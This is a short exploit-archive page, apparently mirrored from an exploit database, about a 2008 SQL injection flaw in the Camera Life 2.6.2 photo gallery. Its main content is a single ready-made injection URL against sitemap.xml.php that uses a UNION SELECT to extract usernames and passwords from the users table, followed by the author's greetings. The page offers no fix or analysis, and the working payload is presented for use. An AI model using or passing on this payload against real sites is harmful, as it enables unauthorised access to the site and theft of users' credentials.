Camera Life 2.6.2 (id) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Camera Life 2.6.2 (id) Remote SQL Injection Vulnerability
# Published : 2008-07-25
# Author : nuclear
# Previous Title : xrms 1.99.2 (RFI/XSS/IG) Multiple Remote Vulnerabilities
# Next Title : FizzMedia 1.51.2 (comment.php mid) SQL Injection Vulnerability

#Camera Life 2.6.2(id) Sql Injection Vulnerability



#Author: nuclear



#script: http://downloads.sourceforge.net/fdcl/cameralife-2.6.2aa.zip



#exploit: sitemap.xml.php?page=photos&id=999999 union select concat(username,0x3a,password),null from users --



#greetz cAs, Mi4night, zYzTeM ,THE_MAN, DiGitalX, sys32r, sys32-hack, Digitalfortress, and me :P

# www.Syue.com [2008-07-25]